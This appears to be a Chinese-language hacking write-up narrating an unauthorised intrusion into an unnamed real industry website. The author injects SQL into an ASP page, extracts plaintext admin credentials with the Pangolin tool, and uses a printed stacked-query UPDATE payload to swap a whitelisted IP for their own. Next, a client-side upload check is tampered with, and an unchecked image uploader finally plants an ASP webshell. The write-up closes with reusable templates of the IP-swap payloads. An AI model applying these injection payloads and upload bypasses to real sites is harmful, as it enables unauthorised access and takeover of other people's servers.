一次在朋友的群里看到某人发出来了这样一个站,看了下发现是个ASP的整站系统,据说是权限设置有点BT,一直拿不到webshell,
酒过三巡 一举拿下某行业网网站安全
。因为以前看过一些aspx的入侵教程,正好可以练练手,于是有了下面的文章。一. 注入检测
随便打开个带参数链接,加入单引号(http://www.XXXXX.com/qipao/qp1.asp?sid=1&MemberID=8*22’),立刻出现了错误(图1)。
为了更直观快捷,拿出Pangolin来检测!是MSSQL服务器(图2)
确定服务器采用的是ASP架构。本以为这些好办了!但是在列目录的时候出现了问题!MS SQLSERVER数据库服务器和WEB服务器既然不在同一台服务器上面!(图3)
不在同一台服务器那么差异备份也就没用!先不管这么多!既然有注入我们就先把管理员帐号和密码弄出来!我们从后台进看有没有什么进展!OK!密码竟然没有加密!(图4)
二. 打破权限拿到WEBSHELL
现在我们有了后台帐号和密码!我们就从后台直接进!但结果往往是令人可悲的!(图5)
怎么办?限制了IP!这下不好进了。。。某位朋友提醒我可以update一下!
进入IP数据库,接下来我们来执行下update
http://www.XXXXX.com/qipao/qp1.asp?sid=1&MemberID=8*22;update promiseIP set IpAddress='58.82.*.94' where IpAddress='121.32.*.206'—
现在进后台试试(图6)
这就是传说中的后台!!赶紧找地方上传SHELL,后台很乱,先随便找个上传口来传个文件试试吧!(图7)
我们再找找其他地方看有没可以上传的!发现网站营销区里有个邮件群发功能!
(图8)
莫非支持asp直接上传!脑海里突然有了灵感!看看再说!(图9)
我们分析下代码(图10)
原来问题出在这里!这样说来!本地提交不就OK了吗?试试!
把if(!checkFile(0,"MailFile","htm,html",true)) return false;语句修改成
if(!checkFile(0,"MailFile","htm,html,asp,asa,cer",true)) return false;保存到本地尝试一下(图11)
出现错误!看来这里是没希望了!再凭借着灵感继续找上传,发现资讯中心里的图片管理,可以直接上传ASP,
电脑资料
《酒过三巡 一举拿下某行业网网站安全》(https://www.unjs.com)。应该是程序员在写程序的时候马虎了(图12)
终于看见了梦寐以求的SHELL界面(图13)
本次入侵的难点在于IP限制登陆、MSSQL数据库服务器和WEB服务器不在一台服务器。
我们运用了update来打破权限配置!把我的IP添加进去了!简单介绍一下本次入侵网站“update”的命令
Update 添加ip:
http://www.XXX.com/qipao/qp1.asp?sid=1&MemberID=8*22;update promiseIP set IpAddress='你的IP' where IpAddress='121.32.*.20X'—
Update 删除ip:
http://www. XXX.com/qipao/qp1.asp?sid=1&MemberID=8*22;update promiseIP set IpAddress='121.32.*.20X' where IpAddress='你的IP'—
121.32.*.20X IP可以在MSSQL数据里找到。
关于Pangolin这款软件:官方最近无法下载,大家可以到紫色贵族的博客下载